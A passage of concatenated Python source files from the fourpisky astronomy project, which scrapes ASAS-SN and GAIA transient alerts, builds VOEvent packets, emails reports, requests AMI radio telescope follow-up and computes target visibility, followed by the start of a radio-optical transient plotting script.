external_id = first_url_text_href_pair[0]
else:
cell = rowdict['raw'][asassn_headers_2018.index('ATEL')]
# print cell.text
# print [c.text for c in cell.getchildren()]
# print '-------------------'
# print '-------------------'
raise ValueError('Could not extract Id for this row, '
'no id found')
return external_id
def asassn_timestamp_str_to_datetime(timestamp_str):
if '.' in timestamp_str:
date_str, day_fraction_str = timestamp_str.split('.')
day_fraction_str = '0.' + day_fraction_str
else:
date_str = timestamp_str
day_fraction_str = 0.
timestamp_dt = (iso8601.parse_date(date_str) +
datetime.timedelta(days=float(day_fraction_str)))
return timestamp_dt
# =======================================================================
asassn_headers_2018 = (
'ASAS-SN',
'Other',
'ATEL',
'RA',
'Dec',
'Discovery',
'V/g',
'SDSS',
'DSS',
'Vizier',
'Spectroscopic Class',
'Comments'
)
asassn_ncols = len(asassn_headers_2018)
class AsassnKeys():
id_asassn = 'id_assasn'
id_other = 'id_other'
atel_url = 'atel_url'
ra = 'ra'
dec = 'dec'
detection_timestamp = 'detection_timestamp'
mag_v = 'mag_v'
sdss_url = 'sdss_url'
dss_url = 'dss_url'
vizier_url = 'vizier_url'
spec_class = 'spec_class'
comment = 'comment'
asassn_hdr_to_internal_key_map = {
'ASAS-SN': AsassnKeys.id_asassn,
'Other': AsassnKeys.id_other,
'ATEL': AsassnKeys.atel_url,
'RA': AsassnKeys.ra,
'Dec': AsassnKeys.dec,
'Discovery': AsassnKeys.detection_timestamp,
'V/g': AsassnKeys.mag_v,
'SDSS': AsassnKeys.sdss_url,
'DSS': AsassnKeys.dss_url,
'Vizier': AsassnKeys.vizier_url,
'Spectroscopic Class': AsassnKeys.spec_class,
'Comments': AsassnKeys.comment,
}
assert tuple(asassn_hdr_to_internal_key_map.keys()) == asassn_headers_2018
asassn_url_only_keys = (
AsassnKeys.atel_url,
AsassnKeys.sdss_url,
AsassnKeys.dss_url,
AsassnKeys.vizier_url,
)
def extract_etree_cells(tree):
tbl = tree.xpath('//table')[0]
children = tbl.getchildren()
# expect two header rows, then a malformed data row. Joy.
assert children[0].tag == 'tr'
assert children[1].tag == 'tr'
assert children[2].tag != 'tr'
cells = children[2:]
headers = tuple([c.text for c in children[0].getchildren()])
# We expect a multiple of assasn_ncols:
assert (len(cells) % asassn_ncols) == 0
# Check headers unchanged
assert headers == asassn_headers_2018
return cells
def asassn_htmlrow_to_dict(cellrow):
param_dict = {}
url_dict = defaultdict(list)
for idx, col_hdr in enumerate(asassn_headers_2018):
param_key = asassn_hdr_to_internal_key_map[col_hdr]
elt = cellrow[idx]
if elt.text and not col_hdr in asassn_url_only_keys:
text = elt.text.strip()
param_dict[param_key] = text
children = elt.getchildren()
if children:
for child in children:
if 'href' in child.attrib:
url_dict[param_key].append(
(child.text, child.attrib['href'])
)
# Delete any entries which are merely placeholders, e.g. '-----'.
trimmed_params = {}
for k, v in param_dict.items():
if not len(v.strip().replace('-', '')):
continue # Skip this one if it's a '------' style placeholder
trimmed_params[k] = v
return {'param': trimmed_params,
'url': url_dict,
'raw': cellrow
}
def transform_pagetree(tree):
"""
Restructure an array of cells into a list of dictionaries
Since parsing to this stage is robust, we also perform bad-row excision here.
"""
cells = extract_etree_cells(tree)
cellrows = []
# Stride through cells at rowlength inferred by ncols
for row_idx, _ in enumerate(cells[::asassn_ncols]):
# Select all cells in current stride, create list representing row
row = [c for c in cells[
asassn_ncols * row_idx:asassn_ncols * row_idx + asassn_ncols]]
cellrows.append(row)
events = []
for cr in cellrows:
event_dict = asassn_htmlrow_to_dict(cr)
row_id = event_dict['param'].get(AsassnKeys.id_asassn)
if row_id in ASSASN_BAD_IDS:
logger.warning('Removed bad ASASSN row with ID {}'.format(row_id))
continue
try:
row_timestamp = asassn_timestamp_str_to_datetime(
event_dict['param'].get(AsassnKeys.detection_timestamp)
)
if not row_timestamp > ASASSN_EARLIEST_REPARSE_DATE:
continue
events.append(event_dict)
except:
logger.exception('Error parsing rowdict:' + str(event_dict))
raise
return events
```
#### File: fourpisky/feeds/gaia.py
```python
from io import BytesIO, StringIO
import contextlib
import csv
import datetime
import logging
import astropy.time
import astropy.units as u
import pytz
import voeventparse as vp
from astropy.coordinates import SkyCoord
from fourpisky.feeds.feedbase import FeedBase
from fourpisky.voevent import (
create_skeleton_4pisky_voevent,
gaia_alert_substream,
get_stream_ivorn_prefix,
)
logger = logging.getLogger(__name__)
class GaiaKeys():
"""
Col headers used in CSV
Full definitions at http://gsaweb.ast.cam.ac.uk/alerts/tableinfo
"""
# Name, Date, RaDeg, DecDeg, AlertMag, HistoricMag, HistoricStdDev, Class, Published, Comment
name = '#Name'
obs_timestamp = ' Date'
pub_timestamp = ' Published'
ra = ' RaDeg'
dec = ' DecDeg'
mag_alert = ' AlertMag'
mag_historic = ' HistoricMag'
mag_historic_std_dev = ' HistoricStdDev'
alert_class = ' Class'
comment = ' Comment'
class GaiaFeed(FeedBase):
name = "GAIA science alerts"
url = "http://gsaweb.ast.cam.ac.uk/alerts/alerts.csv"
substream = gaia_alert_substream
stream_ivorn_prefix = get_stream_ivorn_prefix(substream)
hash_byte_range = (0, 10000)
hash_cache_path = None
# VOEvent details:
text_params_groupname = 'gsaweb_params'
def __init__(self, hash_cache_path=None):
super(GaiaFeed, self).__init__(hash_cache_path)
def parse_content_to_event_data_list(self):
with contextlib.closing(StringIO(self.content.decode())) as f:
rdr = csv.DictReader(f)
events = [row for row in rdr]
return events
def event_data_to_event_id(self, event_data):
"""
Derive a feed-specific identifier for a given event.
Args:
event_data: Feed specific datastructure, typically just a dictionary.
"""
return event_data[GaiaKeys.name]
def get_ivorn_prefixes_for_duplicate(self, feed_id):
"""
Determines what a possible duplicate ivorn might be prefixed by.
For GAIA - events are already uniquely identified within a stream by
their GAIA ID.
However, we now need to also check if there has been a direct VOEvent
submitted from the GAIA service (vs one scraped via their CSV page):
"""
return [self.feed_id_to_ivorn(feed_id),
'ivo://gaia.cam.uk/alerts#'+feed_id,
]
def generate_voevent(self, feed_id):
event_data = self.event_id_data_map[feed_id]
stream_id = self.feed_id_to_stream_id(feed_id)
v = create_skeleton_4pisky_voevent(substream=self.substream,
stream_id=stream_id,
role=vp.definitions.roles.observation,
date=datetime.datetime.utcnow()
)
gsaw_event_url = 'http://gsaweb.ast.cam.ac.uk/alerts/alert/'+feed_id
vp.add_how(v, references=[vp.Reference(uri=self.url),
vp.Reference(uri=gsaw_event_url)
]
)
v.How.Description = "Parsed from GAIA Science Alerts listings by 4PiSky-Bot."
posn_sc = SkyCoord(event_data[GaiaKeys.ra],
event_data[GaiaKeys.dec],
unit=(u.deg, u.deg))
# Astrometric accuracy is a guesstimate,
# http://gsaweb.ast.cam.ac.uk/alerts/tableinfo states that:
# "The sky position may either refer to a source in Gaia's own
# catalogue, or to a source in an external catalogue (e.g. SDSS) used as
# a reference for combining Gaia observations. Where the position comes
# from Gaia's catalogue, it is derived from a single, Gaia observation
# at the triggering point of the alert; this is not an astrometric
# measurement to the full precision of the Gaia main mission."
#
# We assume a 'worst-case' scenario of 100mas from SDSS at mag r=22, cf
# http://classic.sdss.org/dr7/products/general/astrometry.html
err_radius_estimate = 0.1 * u.arcsec
posn_simple = vp.Position2D(ra=posn_sc.ra.deg,
dec=posn_sc.dec.deg,
err=err_radius_estimate.to(u.deg).value,
units=vp.definitions.units.degrees,
system=vp.definitions.sky_coord_system.utc_icrs_geo,
)
# NB GAIA values are in Barycentric co-ordinate time
# (http://en.wikipedia.org/wiki/Barycentric_Coordinate_Time)
observation_time_tcb = astropy.time.Time(
event_data[GaiaKeys.obs_timestamp],
scale='tcb')
# We convert to UTC, in keeping with other feeds:
observation_time_utc_dt = observation_time_tcb.utc.datetime
observation_time_utc_dt = observation_time_utc_dt.replace(tzinfo=pytz.UTC)
vp.add_where_when(
v,
coords=posn_simple,
obs_time=observation_time_utc_dt,
observatory_location=vp.definitions.observatory_location.geosurface)
gaia_params = [vp.Param('Name', event_data[GaiaKeys.name])]
gaia_params.extend([vp.Param(key.strip(), event_data[key]) for key in
(GaiaKeys.alert_class,
GaiaKeys.obs_timestamp,
GaiaKeys.pub_timestamp,
GaiaKeys.ra,
GaiaKeys.dec,
GaiaKeys.comment,
)
])
gaia_params.extend([vp.Param(key.strip(), event_data[key],
unit='mag', ucd='phot.mag') for key in (
GaiaKeys.mag_alert,
GaiaKeys.mag_historic,
GaiaKeys.mag_historic_std_dev,
)
])
v.What.append(vp.Group(params=gaia_params,
name=self.text_params_groupname))
return v
# ==========================================================================
```
#### File: fourpisky-core/fourpisky/log_config.py
```python
import logging
from fourpisky.reports import EmailHandler
from fourpisky.local import contacts
full_date_fmt = "%y-%m-%d (%a) %H:%M:%S"
short_date_fmt = "%H:%M:%S"
verbose_formatter = logging.Formatter(
'%(asctime)s:%(name)s:%(levelname)s:%(message)s',
# '%(asctime)s:%(levelname)s:%(message)s',
full_date_fmt)
def setup_logfile_handlers(logger, logfile_pathstem, filters=None,
log_chunk_bytesize = 5e6):
info_logfile_path = logfile_pathstem + ".log"
debug_logfile_path = logfile_pathstem + ".debug.log"
info_filehandler = logging.handlers.RotatingFileHandler(
info_logfile_path, maxBytes=log_chunk_bytesize, backupCount=10)
info_filehandler.setLevel(logging.INFO)
debug_filehandler = logging.handlers.RotatingFileHandler(
debug_logfile_path, maxBytes=log_chunk_bytesize, backupCount=10)
debug_filehandler.setLevel(logging.DEBUG)
for fh in (info_filehandler, debug_filehandler):
fh.setFormatter(verbose_formatter)
if filters:
for f in filters:
fh.addFilter(f)
logger.addHandler(fh)
def setup_email_errorhandler(logger):
email_handler = EmailHandler(
recipients=[p.email for p in contacts.error_contacts])
email_handler.setFormatter(verbose_formatter)
email_handler.setLevel(logging.ERROR)
logger.addHandler(email_handler)
def setup_logging(logfile_pathstem=None, email_errors=True):
"""
Set up default logging setup
"""
std_formatter = logging.Formatter('%(asctime)s:%(levelname)s:%(message)s',
short_date_fmt)
stdout_logger = logging.StreamHandler()
stdout_logger.setFormatter(std_formatter)
stdout_logger.setLevel(logging.DEBUG)
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
logger.handlers = []
logger.addHandler(stdout_logger)
if logfile_pathstem:
setup_logfile_handlers(logger,logfile_pathstem)
if email_errors:
setup_email_errorhandler(logger)
return logger
```
#### File: fourpisky/scripts/inject_test_events.py
```python
import click
from fourpisky.comms import comet
import logging
import logging.handlers
from fourpisky.voevent import create_alarrm_obs_test_event
import voeventparse as vp
def main(logfile, process_function=comet.send_voevent):
setup_logging(logfile)
logger = logging.getLogger('inject-test-event')
v = create_alarrm_obs_test_event()
process_function(v)
logger.info(
"Processed test Voevent: {}".format(v.attrib['ivorn']))
def save_to_tmpfile(voevent):
testpacket_tmpfile_path = "/tmp/fps_alarrm_testpacket.xml"
with open(testpacket_tmpfile_path, 'w') as f:
logger = logging.getLogger()
vp.dump(voevent, f)
logger.debug("Saved packet to "+testpacket_tmpfile_path)
@click.command()
@click.option('--logfile', type=click.Path(),
default='inject_test_events.log')
@click.option('--testrun', is_flag=True)
def cli(logfile, testrun):
"""
Trivial wrapper about main to create a command line interface entry-point.
"""
if testrun:
main(logfile, process_function=save_to_tmpfile)
else:
main(logfile)
def setup_logging(logfile_path):
"""
Set up INFO- and DEBUG-level logfiles
"""
full_date_fmt = "%y-%m-%d (%a) %H:%M:%S"
short_date_fmt = "%H:%M:%S"
std_formatter = logging.Formatter('%(asctime)s:%(levelname)s:%(message)s',
short_date_fmt)
named_formatter = logging.Formatter(
'%(asctime)s:%(name)s:%(levelname)s:%(message)s',
# '%(asctime)s:%(levelname)s:%(message)s',
full_date_fmt)
#Get to the following size before splitting log into multiple files:
log_chunk_bytesize = 5e6
info_logfile_path = logfile_path
debug_logfile_path = logfile_path+".debug"
info_logger = logging.handlers.RotatingFileHandler(info_logfile_path,
maxBytes=log_chunk_bytesize, backupCount=10)
info_logger.setFormatter(named_formatter)
info_logger.setLevel(logging.INFO)
debug_logger = logging.handlers.RotatingFileHandler(debug_logfile_path,
maxBytes=log_chunk_bytesize, backupCount=10)
debug_logger.setFormatter(named_formatter)
debug_logger.setLevel(logging.DEBUG)
stdout_logger = logging.StreamHandler()
stdout_logger.setFormatter(std_formatter)
# stdout_logger.setLevel(logging.INFO)
stdout_logger.setLevel(logging.DEBUG)
#Set up root logger
logger = logging.getLogger()
logger.handlers=[]
logger.setLevel(logging.DEBUG)
logger.addHandler(info_logger)
logger.addHandler(debug_logger)
logger.addHandler(stdout_logger)
# logging.getLogger('iso8601').setLevel(logging.INFO) #Suppress iso8601 logging
```
#### File: fourpisky/scripts/process_voevent.py
```python
import click
import datetime, pytz
import logging
import os
import subprocess
import voeventparse
from fourpisky.local import contacts
from fourpisky.local import amicomms_safe as amicomms
import fourpisky.log_config
from fourpisky.reports import (generate_report_text, send_report,
generate_testresponse_text)
from fourpisky.sites import AmiLA, Pt5m
from fourpisky.triggers import (is_test_trigger, swift, asassn, gaia)
import fourpisky as fps
logger = logging.getLogger(__name__)
# -------------------------------------------------------------------------------
# Definitions
grb_contacts = contacts.grb_contacts
amicomms.email_address = contacts.test_contacts[0].email
default_archive_root = os.path.join(os.environ["HOME"],
"voevent-deploy", "voe_archive")
active_sites = [AmiLA, Pt5m]
# -------------------------------------------------------------------------------
@click.command()
def cli():
fourpisky.log_config.setup_logging("process_voevent")
stdin_binary = click.get_binary_stream('stdin')
v = voeventparse.loads(stdin_binary.read())
voevent_logic(v)
return 0
def voevent_logic(v):
# SWIFT BAT GRB alert:
try:
if swift.BatGrb.packet_type_matches(v):
swift_bat_grb_logic(v)
if asassn.AsassnAlert.packet_type_matches(v):
asassn_alert_logic(v)
if gaia.GaiaAlert.packet_type_matches(v):
gaia_alert_logic(v)
if is_test_trigger(v):
test_logic(v)
except:
logger.exception("Error processing voevent {}".format(v.attrib['ivorn']))
# archive_voevent(v, rootdir=default_archive_root)
def swift_bat_grb_logic(v):
actions_taken = []
alert = swift.BatGrb(v)
alert_rejection = alert.reject()
if alert_rejection is None:
ami_reject = fps.filters.ami.reject(alert.position)
if ami_reject is None:
try:
trigger_ami_swift_grb_alert(alert)
actions_taken.append('Observation requested from AMI.')
try:
send_initial_ami_alert_vo_notification(alert)
actions_taken.append(
'AMI request notified to VOEvent network.')
except subprocess.CalledProcessError as e:
emsg = '***Notification to VOEvent network failed.***'
logger.warn(emsg)
actions_taken.append(emsg)
except Exception as e:
emsg = 'Observation request failed.'
actions_taken.append(emsg)
logger.error(emsg)
raise
else:
actions_taken.append('Target unsuitable for ami: ' + ami_reject)
else:
actions_taken.append('Alert ignored: ' + alert_rejection)
logger.info("Swift BAT GRB packet received, actions taken:\n{}".format(
actions_taken
))
report = generate_report_text(alert, active_sites, actions_taken)
send_report(subject=alert.full_name, text=report, contacts=grb_contacts)
def asassn_alert_logic(v):
actions_taken = []
alert = asassn.AsassnAlert(v)
if alert.is_recent():
report = generate_report_text(alert, active_sites, actions_taken)
send_report(subject=alert.full_name, text=report, contacts=grb_contacts)
def gaia_alert_logic(v):
actions_taken = []
alert = gaia.GaiaAlert(v)
if alert.is_recent():
report = generate_report_text(alert, active_sites, actions_taken)
send_report(subject=alert.full_name, text=report,
contacts=grb_contacts)
# =============================================================================
# Subroutines
def trigger_ami_swift_grb_alert(alert):
assert isinstance(alert, swift.BatGrb)
target_name = alert.id
comment = alert.id + " / " + alert.inferred_name
duration = datetime.timedelta(hours=2.)
ami_request = amicomms.request_email(
target_coords=alert.position,
target_name=target_name,
duration=duration,
timing='ASAP',
action='CHECK',
requester=amicomms.default_requester,
comment=comment)
fps.comms.email.send_email(recipient_addresses=amicomms.email_address,
subject=amicomms.request_email_subject,
body_text=ami_request)
def send_initial_ami_alert_vo_notification(alert):
notification_timestamp = datetime.datetime.utcnow()
request_status = {
'sent_time': notification_timestamp,
'acknowledged': False,
}
stream_id = notification_timestamp.strftime(
fps.formatting.datetime_format_short)
v = fps.voevent.create_ami_followup_notification(alert,
stream_id=stream_id,
request_status=request_status)
fps.comms.comet.send_voevent(v, contacts.local_vobroker.ipaddress,
contacts.local_vobroker.port)
def test_logic(v):
now = datetime.datetime.now(pytz.utc)
stream_id = v.attrib['ivorn'].partition('#')[-1]
response = fps.voevent.create_4pisky_test_response_voevent(
stream_id=stream_id,
date=now)
fps.comms.comet.send_voevent(response, contacts.local_vobroker.ipaddress,
contacts.local_vobroker.port)
report = generate_testresponse_text(now)
send_report(subject='Test packet received', text=report,
contacts=contacts.test_contacts)
```
#### File: tests/resources/__init__.py
```python
import fourpisky.comms.email
import fourpisky.comms.comet
import fourpisky.reports
from fourpisky.local import amicomms_safe
def dearm_for_tests():
fourpisky.comms.email.send_email = fourpisky.comms.email.dummy_email_send_function
fourpisky.comms.comet.send_voevent = fourpisky.comms.comet.dummy_send_to_comet_stub
test_prefix = "[LOCALTEST] "
if fourpisky.reports.notification_email_prefix[
:len(test_prefix)] != test_prefix:
fourpisky.reports.notification_email_prefix = (
test_prefix + fourpisky.reports.notification_email_prefix)
# Do NOT email AMI
amicomms_safe.email_address = 'blocked!' + amicomms_safe.email_address
```
#### File: fourpisky/tests/test_templates.py
```python
import datetime
import unittest
from fourpisky.reports import generate_testresponse_text
from fourpisky.tests.resources import greenwich
from fourpisky.visibility import get_ephem
from fourpisky.formatting import datetime_format_long, format_datetime
import jinja2
from jinja2 import Environment, PackageLoader
env = Environment(loader=PackageLoader('fourpisky', 'templates'),
trim_blocks=True)
env.filters['datetime'] = format_datetime
#--------------------------------------------------------------
class TestSiteVisReport(unittest.TestCase):
def setUp(self):
self.time = greenwich.vernal_equinox_2012
self.sites = [greenwich.greenwich_site,
greenwich.anti_site]
self.template = env.get_template('includes/visibility_report.j2')
def test_tgt(tgt):
# print "----------------------------"
print("Target: ", tgt.ra, tgt.dec)
# print
for site in self.sites:
vis = get_ephem(tgt, site, self.time)
site_report = self.template.render(site=site,
vis=vis,
dt_style=datetime_format_long)
print(site_report)
# print "----------------------------"
#Export the function to the test cases:
self.test_tgt = test_tgt
print()
def test_never_vis(self):
self.test_tgt(greenwich.never_visible_source)
def test_circumpolar(self):
self.test_tgt(greenwich.circumpolar_north_transit_at_ve_m1hr)
def test_equatorial_up_now(self):
self.test_tgt(greenwich.equatorial_transiting_at_ve)
def test_testresponse_compose():
generate_testresponse_text(datetime.datetime.now())
```
#### File: fourpisky/tests/test_voevent.py
```python
from __future__ import absolute_import
from unittest import TestCase
import voeventparse as vp
from fourpisky.tests.resources import datapaths
import fourpisky.voevent as vo_subs
from fourpisky.triggers.swift import BatGrb
import datetime
import pytz
class TestFollowupVoevent(TestCase):
def test_initial_case(self):
with open(datapaths.swift_bat_grb_pos_v2) as f:
swift_alert = BatGrb(vp.load(f))
current_utc_time = datetime.datetime.utcnow().replace(tzinfo=pytz.UTC)
request_status = {'sent_time': current_utc_time,
'acknowledged': False,
}
v = vo_subs.create_ami_followup_notification(swift_alert,
stream_id=1,
request_status=request_status)
vp.assert_valid_as_v2_0(v)
with open('/tmp/test_voevent.xml', 'wb') as f:
vp.dump(v, f)
```
#### File: fourpisky/triggers/alertbase.py
```python
import voeventparse
from fourpisky.utils import convert_voe_coords_to_eqposn
from collections import OrderedDict
import datetime
import pytz
from fourpisky.requiredatts import RequiredAttributesMetaclass
class AlertBase(object):
__metaclass__ = RequiredAttributesMetaclass
_required_attributes = [
'alert_notification_period',
'id',
'inferred_name',
'isotime',
'ivorn',
'position',
'type_description',
]
@property
def full_name(self):
name = self.id
if self.inferred_name:
name+= ' / ' + self.inferred_name
return name
def is_recent(self):
if not self.alert_notification_period:
return True
now = datetime.datetime.utcnow().replace(tzinfo=pytz.UTC)
if (now - self.isotime) < self.alert_notification_period:
return True
return False
```
#### File: fourpisky/triggers/asassn.py
```python
import voeventparse
from collections import OrderedDict
import datetime
import pytz
from fourpisky.utils import convert_voe_coords_to_eqposn
from fourpisky.feeds.asassn import AsassnFeed, AsassnKeys
from fourpisky.triggers.alertbase import AlertBase
default_alert_notification_period = datetime.timedelta(days=4)
class AsassnAlert(AlertBase):
type_description = "ASASSN alert"
@staticmethod
def packet_type_matches(voevent):
ivorn = voevent.attrib['ivorn']
if ivorn.startswith(AsassnFeed.stream_ivorn_prefix):
return True
return False
def __init__(self, voevent,
alert_notification_period=None):
self.voevent = voevent
self.ivorn = self.voevent.attrib['ivorn']
self.alert_notification_period = alert_notification_period
if self.alert_notification_period is None:
self.alert_notification_period = default_alert_notification_period
if not AsassnAlert.packet_type_matches(voevent):
raise ValueError(
"Cannot instantiate AsassnAlert; packet header mismatch.")
group_params = voeventparse.get_grouped_params(self.voevent)
text_params_grp = group_params[AsassnFeed.text_params_groupname]
self.text_params = OrderedDict(
(k, d['value']) for k, d in text_params_grp.items())
url_params_grp = group_params[AsassnFeed.url_params_groupname]
self.url_params = OrderedDict(
(k, d['value']) for k, d in url_params_grp.items())
self.id = self.text_params.get(AsassnKeys.id_asassn)
if self.id is None:
self.id = self.text_params.get(AsassnKeys.id_other)
# Assigned name according to the 'why' section of voevent packet:
self.inferred_name = 'ASASSN @ '+self.text_params.get(AsassnKeys.detection_timestamp)
self.isotime = voeventparse.get_event_time_as_utc(self.voevent)
self.position = convert_voe_coords_to_eqposn(
voeventparse.get_event_position(self.voevent))
```
#### File: fourpisky/triggers/__init__.py
```python
from __future__ import absolute_import
import fourpisky.triggers.swift
from fourpisky.voevent import ivorn_base, test_trigger_substream
def is_test_trigger(voevent):
ivorn = voevent.attrib['ivorn']
if ivorn.startswith("ivo://"+ ivorn_base+'/'+test_trigger_substream+'#'):
return True
return False
```
#### File: fourpisky-core/fourpisky/utils.py
```python
import os
import string
from collections import Sequence
from ephem import Equatorial, J2000
from fourpisky.visibility import DEG_PER_RADIAN
import voeventparse
import logging
logger = logging.getLogger(__name__)
def listify(x):
"""
Returns [x] if x is not already a list.
Used to make functions accept either scalar or array inputs -
simply `listify` a variable to make sure it's in list format.
"""
if (not isinstance(x, str)) and isinstance(x, Sequence):
return x
else:
return [x]
def ensure_dir(filename):
"""Ensure parent directory exists, so you can write to `filename`."""
d = os.path.dirname(filename)
if not os.path.exists(d):
os.makedirs(d)
def convert_voe_coords_to_eqposn(c):
"""Unit-checked conversion from voeventparse.Position2D -> astropysics FK5"""
acceptable_coord_sys = (
voeventparse.definitions.sky_coord_system.utc_fk5_geo,
voeventparse.definitions.sky_coord_system.utc_icrs_geo
)
if (c.system not in acceptable_coord_sys
or c.units != 'deg'):
raise ValueError(
"Unrecognised Coords type: %s, %s" % (c.system, c.units))
return Equatorial(c.ra / DEG_PER_RADIAN, c.dec / DEG_PER_RADIAN,
epoch=J2000)
def namedtuple_to_dict(nt):
return {key: nt[i] for i, key in enumerate(nt._fields)}
def sanitise_string_for_stream_id(unsafe_string):
"""
Removes any unhelpful characters (e.g. #,/,<space>,%) from a string.
We pass:
-Letters ([A-Za-z])
-digits ([0-9]),
-hyphens ("-"),underscores ("_"), colons (":"), and periods (".")
-Plus symbol ('+')
We replace '\', '/','#', and <space> by underscore.
"""
s = unsafe_string
if unsafe_string[0] == ".":
s = unsafe_string[1:]
return "".join(c for c in
s.replace('/', '_').replace('\\', '_'). \
replace('#', '_').replace(' ', '_')
if c in string.ascii_letters + string.digits + '_-:.+')
def archive_voevent_to_file(v, rootdir):
relpath, filename = v.attrib['ivorn'].split('//')[1].split('#')
filename += ".xml"
fullpath = os.path.sep.join((rootdir, relpath, filename))
ensure_dir(fullpath)
with open(fullpath, 'wb') as f:
voeventparse.dump(v, f)
logger.debug("Wrote voevent {} to {}".format(
v.attrib['ivorn'], fullpath
))
```
#### File: fourpisky-core/fourpisky/visibility.py
```python
from __future__ import absolute_import
import ephem
import math
import pytz
from collections import OrderedDict
DEG_PER_RADIAN = 180 / math.pi
# -----------------------------------------------------------------
class TargetStatusKeys():
"""A namespaced set of dict keys for visibility reports"""
site_lst = 'site_lst'
type = 'type'
visible_now = 'visible_now'
current_pos = 'current_position'
prev_transit_time = 'prev_transit_time'
prev_transit_pos = 'prev_transit_position'
next_transit_time = 'next_transit_time'
next_transit_pos = 'next_transit_position'
rise_time = 'rise_time'
set_time = 'set_time'
timeline = 'timeline'
def get_ephem(eq_posn, observer, current_time):
"""Get basic information on target visibility for a given site.
Returns a dict populated with relevant TargetStatusKeys.
"""
keys = TargetStatusKeys
assert isinstance(observer, ephem.Observer)
# Get times:
observer.date = current_time
fixedbody = ephem.FixedBody()
fixedbody._ra = eq_posn.ra
fixedbody._dec = eq_posn.dec
fixedbody._epoch = eq_posn.epoch
fixedbody.compute(observer)
result = {}
result[keys.site_lst] = str(observer.sidereal_time())
result[keys.current_pos] = (fixedbody.alt * DEG_PER_RADIAN,
fixedbody.az * DEG_PER_RADIAN)
result[keys.visible_now] = (fixedbody.alt > observer.horizon)
if fixedbody.neverup:
result[keys.type] = 'never'
return result
result[keys.next_transit_time] = pytz.utc.localize(
observer.next_transit(fixedbody).datetime())
result[keys.prev_transit_time] = pytz.utc.localize(
observer.previous_transit(fixedbody).datetime())
if fixedbody.circumpolar:
# Circumpolar
result[keys.type] = 'always'
events = ['previous_transit','next_transit' ]
else:
# Regular rise and set
result[keys.type] = 'sometimes'
events = [
'previous_rising', 'previous_transit', 'previous_setting',
'next_rising', 'next_transit', 'next_setting',
]
# Returns timezone unaware ('naive') datetimes
timeline = {}
for event_name in events:
observer_func = getattr(observer, event_name)
event_date = pytz.utc.localize(observer_func(fixedbody).datetime())
timeline[event_date] = event_name.replace('_',' ').capitalize()
timeline[current_time] = '(Trigger received)'
result[keys.timeline]=OrderedDict()
for dtime in sorted(timeline):
result[keys.timeline][dtime] = timeline[dtime]
transit_observer = ephem.Observer()
transit_observer.lon = observer.lon
transit_observer.lat = observer.lat
transit_observer.horizon = observer.horizon
transit_observer.date = result[keys.next_transit_time]
fixedbody.compute(transit_observer)
result[keys.next_transit_pos] = (fixedbody.alt * DEG_PER_RADIAN,
fixedbody.az * DEG_PER_RADIAN)
return result
```
#### File: fourpisky-core/integration_tests/feed_voevent_to_celery.py
```python
import logging
import click
import fourpisky.voevent
import voeventparse
from fourpisky.taskqueue.tasks import process_voevent_celerytask
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger(__name__)
@click.command()
def cli():
click.echo("Attempting celery task")
test_packet = fourpisky.voevent.create_4pisky_test_trigger_voevent()
voevent_bytestring=voeventparse.dumps(test_packet)
process_voevent_celerytask.delay(voevent_bytestring)
click.echo("Task fired")
return 0
if __name__ == '__main__':
cli()
```
#### File: fourpisky-core/profiling/voevent-load-tester.py
```python
import multiprocessing
import fourpisky
import fourpisky.comms.comet
import fourpisky.voevent
import logging
import datetime
import time
import threading
from functools import wraps
import signal
import sys
logger = logging.getLogger('load-test')
def rate_limited(max_per_second):
"""
Decorator that make functions not be called faster than
"""
lock = threading.Lock()
min_interval = 1.0 / float(max_per_second)
def decorate(func):
last_time_called = [0.0]
@wraps(func)
def rate_limited_function(*args, **kwargs):
lock.acquire()
elapsed = time.clock() - last_time_called[0]
left_to_wait = min_interval - elapsed
if left_to_wait > 0:
time.sleep(left_to_wait)
lock.release()
ret = func(*args, **kwargs)
last_time_called[0] = time.clock()
return ret
return rate_limited_function
return decorate
def init_worker_to_ignore_sigint():
#Use the readymade 'SIG_IGN' (ignore signal) handler to handle SIGINT
signal.signal(signal.SIGINT, signal.SIG_IGN)
def generate_and_send_packet():
now = datetime.datetime.utcnow()
# uuid =fourpisky.voevent.generate_stream_id(now)
# return "UUID:"+uuid
try:
test_packet = fourpisky.voevent.create_4pisky_test_trigger_voevent()
dummy_packet = fourpisky.voevent.create_skeleton_4pisky_voevent(
substream="DUMMYPACKET",
stream_id=fourpisky.voevent.generate_stream_id(now),
date=now
)
sendpacket = dummy_packet
# sendpacket = test_packet
ivorn = sendpacket.attrib['ivorn']
fourpisky.comms.comet.send_voevent(sendpacket)
except Exception as e:
return "Error sending {}:\n {}".format(
ivorn, e.output)
return "Sent {}".format(ivorn)
def logger_callback(summary):
"""Used to return the 'job complete' log message in the master thread."""
if summary.startswith('Error'):
logger.error('There was an error:')
logger.error(summary)
else:
pass
# logger.info('*** Job complete: ' + summary)
def main():
n_threads = 6
n_events = 200
n_per_second = 15
pool = multiprocessing.Pool(n_threads,
initializer=init_worker_to_ignore_sigint)
results = []
start = datetime.datetime.utcnow()
@rate_limited(n_per_second)
def add_job_to_pool():
results.append(pool.apply_async(generate_and_send_packet,
callback=logger_callback
))
logging.info("Beginning run...")
try:
for i in range(n_events):
logger.debug('Sending event #{}'.format(i))
add_job_to_pool()
except KeyboardInterrupt:
logger.warning("Caught KeyboardInterrupt, terminating")
pool.terminate()
pool.join()
return 1
logging.info("... Done.")
n_fails = 0
resultset = set()
for obj in results:
# print res.get(), type(res.get())
summary = obj.get()
if summary.startswith('Error'):
n_fails += 1
resultset.add(summary)
end = datetime.datetime.utcnow()
assert len(resultset) == len(results)
time_taken = (end - start).total_seconds()
print "Sent {} events in {} seconds".format(
n_events, time_taken
)
print "Rate: {} /second ".format(n_events / time_taken)
print "Or {} /second/thread".format(n_events / time_taken / n_threads)
print "{} failed (proportion {})".format(n_fails, float(n_fails) / n_events)
if __name__ == '__main__':
logging.basicConfig(level=logging.DEBUG)
sys.exit(main())
``` |
{
"source": "4pisky/radio-optical-transients-plot",
"score": 3
} |
#### File: radio_optical_transients_plot/bin/radio_optical_figures.py
```python
import argparse
import matplotlib.pyplot as plt
from radio_optical_transients_plot.ro_main import (
RadioOpticalPlot, RadioOpticalTrackPlot
)
def parse_args() -> argparse.Namespace:
"""
Parse the arguments.
Returns:
The argument namespace.
"""
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
"--figure",
type=str,
choices=[
'1', '2', '3', '4', '5a', '5b',
